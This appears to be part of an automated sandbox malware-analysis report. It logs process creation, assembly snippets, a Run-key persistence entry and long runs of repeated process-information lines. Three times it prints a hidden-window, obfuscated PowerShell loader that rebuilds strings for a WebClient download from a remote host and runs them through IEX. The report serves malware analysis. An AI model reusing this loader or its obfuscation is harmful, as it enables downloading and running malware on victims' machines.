              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "echo $Reconjoin;function Yngve($Sagan){ .($Miljforandringen) ($Sagan)} function Freeloaded($Knyttelversenes){$Unsuppleness=5;do{$Nonordered+=$Knyttelversenes[$Unsuppleness];$Unsuppleness+=6;$Gaardmand=Format-List} until(!$Knyttelversenes[$Unsuppleness])$Nonordered}$Stokerfyrene9=Freeloaded ' GadeN s ejeMangat Anhy.Retniw';$Stokerfyrene9+=Freeloaded 'Lithse nalybFa erc U milPrec.IRailrE SlgtNVid rt';$Udtalendes=Freeloaded 'CommuMSpurro,vulrz in.tiCoccilBir.mlTre eaSte,n/';$Unsupplenesschthyologic=Freeloaded 'VirtuTTermolDebats Humu1Tusin2';$Soejlevis='Green[GratiNCentreM niatHegem. Ud aSGrisgETeaterAfslav Ce lIClaywCFlybyENectaPDionyo PanaI aarenF,refTIn,erMDrgniaLuftfn FednaBeredgRapnie DoveRBreds]Helli:Smoko: portSRestre He lcP.rmuuTalefR ArriiBalbutGastrYSm.lkpPusssRSlaveOTyptoT Sy co ffabCBouiloPlejelB,jle= Soli$SkuesU Ss eNtoymas fteuGa.lopCystep Ui.eLTonsiEjejunn SystEContrSAristSO denCStyk hH ortT Ove h entyParalOTr efL Veg oBargaGHorteIS ngnc';$Udtalendes+=Freeloaded ' Ski 5Ov rk.Jensp0Eastr Inebr( Rev W.elefiPantenGipsudLemaro NeurwApotesManas Attr NZamorTgamle Te.ns1Sputn0cuiss. Ti.s0Fines;Torsk CadmiWFrakoiVul,anGaase6Kreat4,lkef; Stic Uninsx Slag6,awmo4P two;fort UnchrChefsvCivil:D,ndr1uneat3 ykke4Coshe.Fotog0.itel)Kr ig UdpoGTranseS aftcMuslikAortooRetab/Trach2 prin0Skumm1Afrik0Rhamn0Outsp1 cadm0S ill1Be gg KnittFUrtepi AvisreftereNarref K onoInditx S tr/No,su1Rdbed3 Besk4 Bist.Bukse0';$Absurdistisk=Freeloaded ' Kom,uPetu,SGearkEPulveR Kell-GendeaForkoG inusEPseudNSpherT';$Gigtfebers=Freeloaded 'E bothHavmit .wizt inegpReallsMniac:baa.m/Chi.k/Eng lpTapsae ForhnIterodFr,tieAfsp l PurdiRespivAdopteindklr PodoySk alh Nat linde . Har cMisaloD,modmVog.m/BrugeMS ttiuBidsar C mpkAlkyde Anc rOv,rc. SejllMtrikpTank k Spic> Natuh Bl.et F lctMhla,pUndersA gaa:Udvik/Deute/Skol.pMagteeSkibsn Im rd.ophieAntislD iryiPa advNonreeblaakrpatriy Rou,h revolTrskoxSubtrp Medd.Uddifc DyksoUdslum Hrme/WolflMRekinuGrororYndlikT luseSleskr nder.Hektol GrnspStridk';$Delggelsesdrifters=Freeloaded 'Overd>';$Miljforandringen=Freeloaded 'GrublIGraniE By.aX';$Adulterers='sammenbundne';$Unincriminated='\regnskabsinformationernes.arm';Yngve (Freeloaded 'Kontr$ForfagPraecLSemipO ekstbWadinaHjertlClu r:T ailtEd toRGlansOD.gteuK epesSaccaeLebisR Cavae Heget la atMor gENedrySAutop= Toug$OxygaEHistoNA sisVScore:JutehAPluriPClimapprecodPenn aHjemmtTo liA Disj+Skelg$SonorU ContNUnsi Iu iraNAutenCStnder ,eakiKloreMLateri antinUdtrkaK mmuT,uldtE V,std');Yngve (Freeloaded 'Probl$PerioGEksemlDi.agoPostnbsalamaEndo LPerfe:JujubHSuiliE lreSTa llTPerso=glded$ Sup.gPr seiObserGVisnitIndisFU,dlaePig ibAssocETidsuRBesidS .rim.InaptsTryk pRevisl DomfIheldiTSur,n(Ant.t$Slt ed BusieFunktLSymphGTriolgHybrieDolenL GoanSSc ooeruti sBrandDHolodrCom aIMultifoppostPat.neIndt,rKo ifSOrdre)');Yngve (Freeloaded $Soejlevis);$Gigtfebers=$hest[0];$Mervrdiafgift=(Freeloaded 'Who t$ uncogNedd LPincuoBl
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Reconjoin;function Yngve($Sagan){ .($Miljforandringen) ($Sagan)} function Freeloaded($Knyttelversenes){$Unsuppleness=5;do{$Nonordered+=$Knyttelversenes[$Unsuppleness];$Unsuppleness+=6;$Gaardmand=Format-List} until(!$Knyttelversenes[$Unsuppleness])$Nonordered}$Stokerfyrene9=Freeloaded ' GadeN s ejeMangat Anhy.Retniw';$Stokerfyrene9+=Freeloaded 'Lithse nalybFa erc U milPrec.IRailrE SlgtNVid rt';$Udtalendes=Freeloaded 'CommuMSpurro,vulrz in.tiCoccilBir.mlTre eaSte,n/';$Unsupplenesschthyologic=Freeloaded 'VirtuTTermolDebats Humu1Tusin2';$Soejlevis='Green[GratiNCentreM niatHegem. Ud aSGrisgETeaterAfslav Ce lIClaywCFlybyENectaPDionyo PanaI aarenF,refTIn,erMDrgniaLuftfn FednaBeredgRapnie DoveRBreds]Helli:Smoko: portSRestre He lcP.rmuuTalefR ArriiBalbutGastrYSm.lkpPusssRSlaveOTyptoT Sy co ffabCBouiloPlejelB,jle= Soli$SkuesU Ss eNtoymas fteuGa.lopCystep Ui.eLTonsiEjejunn SystEContrSAristSO denCStyk hH ortT Ove h entyParalOTr efL Veg oBargaGHorteIS ngnc';$Udtalendes+=Freeloaded ' Ski 5Ov rk.Jensp0Eastr Inebr( Rev W.elefiPantenGipsudLemaro NeurwApotesManas Attr NZamorTgamle Te.ns1Sputn0cuiss. Ti.s0Fines;Torsk CadmiWFrakoiVul,anGaase6Kreat4,lkef; Stic Uninsx Slag6,awmo4P two;fort UnchrChefsvCivil:D,ndr1uneat3 ykke4Coshe.Fotog0.itel)Kr ig UdpoGTranseS aftcMuslikAortooRetab/Trach2 prin0Skumm1Afrik0Rhamn0Outsp1 cadm0S ill1Be gg KnittFUrtepi AvisreftereNarref K onoInditx S tr/No,su1Rdbed3 Besk4 Bist.Bukse0';$Absurdistisk=Freeloaded ' Kom,uPetu,SGearkEPulveR Kell-GendeaForkoG inusEPseudNSpherT';$Gigtfebers=Freeloaded 'E bothHavmit .wizt inegpReallsMniac:baa.m/Chi.k/Eng lpTapsae ForhnIterodFr,tieAfsp l PurdiRespivAdopteindklr PodoySk alh Nat linde . Har cMisaloD,modmVog.m/BrugeMS ttiuBidsar C mpkAlkyde Anc rOv,rc. SejllMtrikpTank k Spic> Natuh Bl.et F lctMhla,pUndersA gaa:Udvik/Deute/Skol.pMagteeSkibsn Im rd.ophieAntislD iryiPa advNonreeblaakrpatriy Rou,h revolTrskoxSubtrp Medd.Uddifc DyksoUdslum Hrme/WolflMRekinuGrororYndlikT luseSleskr nder.Hektol GrnspStridk';$Delggelsesdrifters=Freeloaded 'Overd>';$Miljforandringen=Freeloaded 'GrublIGraniE By.aX';$Adulterers='sammenbundne';$Unincriminated='\regnskabsinformationernes.arm';Yngve (Freeloaded 'Kontr$ForfagPraecLSemipO ekstbWadinaHjertlClu r:T ailtEd toRGlansOD.gteuK epesSaccaeLebisR Cavae Heget la atMor gENedrySAutop= Toug$OxygaEHistoNA sisVScore:JutehAPluriPClimapprecodPenn aHjemmtTo liA Disj+Skelg$SonorU ContNUnsi Iu iraNAutenCStnder ,eakiKloreMLateri antinUdtrkaK mmuT,uldtE V,std');Yngve (Freeloaded 'Probl$PerioGEksemlDi.agoPostnbsalamaEndo LPerfe:JujubHSuiliE lreSTa llTPerso=glded$ Sup.gPr seiObserGVisnitIndisFU,dlaePig ibAssocETidsuRBesidS .rim.InaptsTryk pRevisl DomfIheldiTSur,n(Ant.t$Slt ed BusieFunktLSymphGTriolgHybrieDolenL GoanSSc ooeruti sBrandDHolodrCom aIMultifoppostPat.neIndt,rKo ifSOrdre)');Yngve (Freeloaded $Soejlevis);$Gigtfebers=$hest[0];$Mervrdiafgift=(Freeloaded 'Wh
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "echo $Reconjoin;function Yngve($Sagan){ .($Miljforandringen) ($Sagan)} function Freeloaded($Knyttelversenes){$Unsuppleness=5;do{$Nonordered+=$Knyttelversenes[$Unsuppleness];$Unsuppleness+=6;$Gaardmand=Format-List} until(!$Knyttelversenes[$Unsuppleness])$Nonordered}$Stokerfyrene9=Freeloaded ' GadeN s ejeMangat Anhy.Retniw';$Stokerfyrene9+=Freeloaded 'Lithse nalybFa erc U milPrec.IRailrE SlgtNVid rt';$Udtalendes=Freeloaded 'CommuMSpurro,vulrz in.tiCoccilBir.mlTre eaSte,n/';$Unsupplenesschthyologic=Freeloaded 'VirtuTTermolDebats Humu1Tusin2';$Soejlevis='Green[GratiNCentreM niatHegem. Ud aSGrisgETeaterAfslav Ce lIClaywCFlybyENectaPDionyo PanaI aarenF,refTIn,erMDrgniaLuftfn FednaBeredgRapnie DoveRBreds]Helli:Smoko: portSRestre He lcP.rmuuTalefR ArriiBalbutGastrYSm.lkpPusssRSlaveOTyptoT Sy co ffabCBouiloPlejelB,jle= Soli$SkuesU Ss eNtoymas fteuGa.lopCystep Ui.eLTonsiEjejunn SystEContrSAristSO denCStyk hH ortT Ove h entyParalOTr efL Veg oBargaGHorteIS ngnc';$Udtalendes+=Freeloaded ' Ski 5Ov rk.Jensp0Eastr Inebr( Rev W.elefiPantenGipsudLemaro NeurwApotesManas Attr NZamorTgamle Te.ns1Sputn0cuiss. Ti.s0Fines;Torsk CadmiWFrakoiVul,anGaase6Kreat4,lkef; Stic Uninsx Slag6,awmo4P two;fort UnchrChefsvCivil:D,ndr1uneat3 ykke4Coshe.Fotog0.itel)Kr ig UdpoGTranseS aftcMuslikAortooRetab/Trach2 prin0Skumm1Afrik0Rhamn0Outsp1 cadm0S ill1Be gg KnittFUrtepi AvisreftereNarref K onoInditx S tr/No,su1Rdbed3 Besk4 Bist.Bukse0';$Absurdistisk=Freeloaded ' Kom,uPetu,SGearkEPulveR Kell-GendeaForkoG inusEPseudNSpherT';$Gigtfebers=Freeloaded 'E bothHavmit .wizt inegpReallsMniac:baa.m/Chi.k/Eng lpTapsae ForhnIterodFr,tieAfsp l PurdiRespivAdopteindklr PodoySk alh Nat linde . Har cMisaloD,modmVog.m/BrugeMS ttiuBidsar C mpkAlkyde Anc rOv,rc. SejllMtrikpTank k Spic> Natuh Bl.et F lctMhla,pUndersA gaa:Udvik/Deute/Skol.pMagteeSkibsn Im rd.ophieAntislD iryiPa advNonreeblaakrpatriy Rou,h revolTrskoxSubtrp Medd.Uddifc DyksoUdslum Hrme/WolflMRekinuGrororYndlikT luseSleskr nder.Hektol GrnspStridk';$Delggelsesdrifters=Freeloaded 'Overd>';$Miljforandringen=Freeloaded 'GrublIGraniE By.aX';$Adulterers='sammenbundne';$Unincriminated='\regnskabsinformationernes.arm';Yngve (Freeloaded 'Kontr$ForfagPraecLSemipO ekstbWadinaHjertlClu r:T ailtEd toRGlansOD.gteuK epesSaccaeLebisR Cavae Heget la atMor gENedrySAutop= Toug$OxygaEHistoNA sisVScore:JutehAPluriPClimapprecodPenn aHjemmtTo liA Disj+Skelg$SonorU ContNUnsi Iu iraNAutenCStnder ,eakiKloreMLateri antinUdtrkaK mmuT,uldtE V,std');Yngve (Freeloaded 'Probl$PerioGEksemlDi.agoPostnbsalamaEndo LPerfe:JujubHSuiliE lreSTa llTPerso=glded$ Sup.gPr seiObserGVisnitIndisFU,dlaePig ibAssocETidsuRBesidS .rim.InaptsTryk pRevisl DomfIheldiTSur,n(Ant.t$Slt ed BusieFunktLSymphGTriolgHybrieDolenL GoanSSc ooeruti sBrandDHolodrCom aIMultifoppostPat.neIndt,rKo ifSOrdre)');Yngve (Freeloaded $Soejlevis);$Gigtfebers=$hest[0];$Mervrdiafgift=(Freeloaded 'Who t$ uncogNedd LPincuoBlJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF7C8165285 push eax; ret 2_2_00007FF7C81652C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF7C816C778 pushad ; retf 2_2_00007FF7C816C781
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF7C8238816 push eax; ret 2_2_00007FF7C8238831
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF7C8233452 pushfd ; iretd 2_2_00007FF7C8233453
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF7C823701A pushad ; iretd 2_2_00007FF7C823701B
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_02D1D9FC pushfd ; ret 4_2_02D1D9FD
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08AFB86B push edx; retf 4_2_08AFB86E
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08AF605F pushad ; retf 4_2_08AF606D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08AF55DE push eax; ret 4_2_08AF55ED
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08AF4EE3 push esp; iretd 4_2_08AF4EE5
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08AF46F7 pushfd ; iretd 4_2_08AF46F9
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0446605F pushad ; retf 10_2_0446606D
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0446B86B push edx; retf 10_2_0446B86E
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_04464EE3 push esp; iretd 10_2_04464EE5
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_044646F7 pushfd ; iretd 10_2_044646F9
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_044655DE push eax; ret 10_2_044655ED
              Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Startup keyJump to behavior
              Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Startup keyJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
